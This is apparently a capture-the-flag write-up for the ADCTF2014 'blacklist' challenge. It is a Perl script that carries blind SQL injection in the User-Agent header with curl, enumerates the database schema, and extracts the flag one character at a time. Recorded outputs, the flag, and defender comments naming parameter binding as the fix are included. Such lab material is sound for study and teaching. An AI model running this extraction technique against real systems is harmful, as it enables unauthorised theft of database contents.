blacklist
問題
We have stupid blacklist. The flag is in flag table.
blacklist.adctf2014.katsudon.org
メモ
解法
use strict;
use warnings;

# Base URL of the CTF challenge instance that every request in this script goes to.
my $url = 'http://blacklist.adctf2014.katsudon.org/';
# Run an external command and return everything it wrote to stdout as one
# string. Returns nothing (undef / empty list) when the pipe cannot be opened.
#
# The command is given as a list, so each element reaches the child as its
# own argv entry; with more than one element no local shell parses the
# values, which matters here because one argument is full of quotes and
# parentheses. The child's exit status is not inspected.
sub system_pipe {
    my @command = @_;

    my $opened = open(my $child_out, "-|", @command);
    return unless $opened;

    my $output = "";
    while (defined(my $line = <$child_out>)) {
        $output .= $line;
    }
    return $output;
}
# Return the number of rows in $from that satisfy the optional $where
# condition, as reported back by the challenge server.
#
# The count is requested through a scalar subquery carried in the HTTP
# User-Agent header (curl -A). The number is read from the first
# double-quoted string that follows the first <li> in the response.
# Dies when the response does not have that shape.
#
# NOTE(review): the server code is not on this page. The shape of the header
# value suggests the server concatenates the User-Agent into a quoted SQL
# string literal; binding it as a query parameter would make the value inert,
# which a keyword blacklist does not guarantee.
sub extract_count_rows {
    my ($from, $where) = @_;

    my $where_clause = $where ? "WHERE $where" : "";

    # One request per second.
    sleep 1;

    my $ua = "0' + (SELECT COUNT(*) FROM $from $where_clause) + '";
    my $result = system_pipe("curl", "-s", "-A", $ua, $url);

    die unless $result =~ /<li>.*?"(.*?)"/;
    return int($1);
}
# Return LENGTH($column) for the row at zero-based offset $row_at of $from,
# optionally filtered by $where.
#
# Same transport as the other helpers: the subquery travels in the
# User-Agent header and the answer is the first double-quoted string after
# the first <li> of the response. Dies when no such string is found.
sub extract_length {
    my ($row_at, $column, $from, $where) = @_;

    my $where_clause = "";
    $where_clause = "WHERE $where" if $where;

    # One request per second.
    sleep 1;

    my $ua = "0' + (SELECT LENGTH($column) FROM $from $where_clause LIMIT $row_at,1) + '";
    my $result = system_pipe("curl", "-s", "-A", $ua, $url);

    if (my ($reported) = $result =~ /<li>.*?"(.*?)"/) {
        return int($reported);
    }
    die;
}
# Return one character of $column: the character at zero-based position
# $char_at in the row at zero-based offset $row_at of $from, optionally
# filtered by $where.
#
# The server is asked for ORD() of the character, so the answer comes back
# as a number and is turned into a character again with chr(). The number is
# read from the first double-quoted string after the first <li> of the
# response; the function dies when no such string is found.
sub extract_char {
    my ($row_at, $char_at, $column, $from, $where) = @_;

    my $where_clause = $where ? "WHERE $where" : "";

    # Callers count from 0, SUBSTR counts from 1.
    $char_at++;

    # One request per second.
    sleep 1;

    my $ua = "0' + (SELECT ORD(SUBSTR($column, $char_at, 1)) FROM $from $where_clause LIMIT $row_at,1) + '";
    my $result = system_pipe("curl", "-s", "-A", $ua, $url);

    if (my ($code_point) = $result =~ /<li>.*?"(.*?)"/) {
        return chr($code_point);
    }
    die;
}
# Read every value of $column from $table (optionally filtered by $where)
# and return them as a list of strings, one per row.
#
# Works row by row: first the row count, then for each row its length, then
# one request per character. Every helper sleeps one second per request, so
# the total run time grows with the number of characters read.
sub extract {
    my ($column, $table, $where) = @_;

    my $row_total = extract_count_rows($table, $where);

    my @values;
    foreach my $row_index (0 .. $row_total - 1) {
        my $width = extract_length($row_index, $column, $table, $where);

        my @chars;
        foreach my $position (0 .. $width - 1) {
            push @chars, extract_char($row_index, $position, $column, $table, $where);
        }
        push @values, join("", @chars);
    }
    return @values;
}
# Driver. The three POD sections below are earlier stages that were run once
# and then disabled; each keeps the output it produced. Only the last
# statement is live.
#
# Defender's reading of the recorded output: the account used by the web
# application could read INFORMATION_SCHEMA and the flag table, although the
# only table it appears to need is access_log. A keyword blacklist on the
# User-Agent did not stop any of this; bound query parameters and a database
# account limited to the logging table are the fixes to look for.

=comment
print "$_\n"
for extract("SCHEMA_NAME", "INFORMATION_SCHEMA.SCHEMATA");
=comment
information_schema
blacklist
=cut

=comment
print "$_\n"
for extract("TABLE_NAME", "INFORMATION_SCHEMA.TABLES",
"TABLE_SCHEMA='blacklist'");
=comment
access_log
flag
=cut

=comment
print "$_\n"
for extract("COLUMN_NAME", "INFORMATION_SCHEMA.COLUMNS",
"TABLE_SCHEMA='blacklist' AND TABLE_NAME='flag'");
=comment
flag is here!!!
=cut

# The column name contains spaces and punctuation, hence the backticks.
foreach my $value (extract("`flag is here!!!`", "blacklist.flag", "")) {
    print "$value\n";
}
# ADCTF_d0_NoT_Us3_FUcK1N_8l4ckL1sT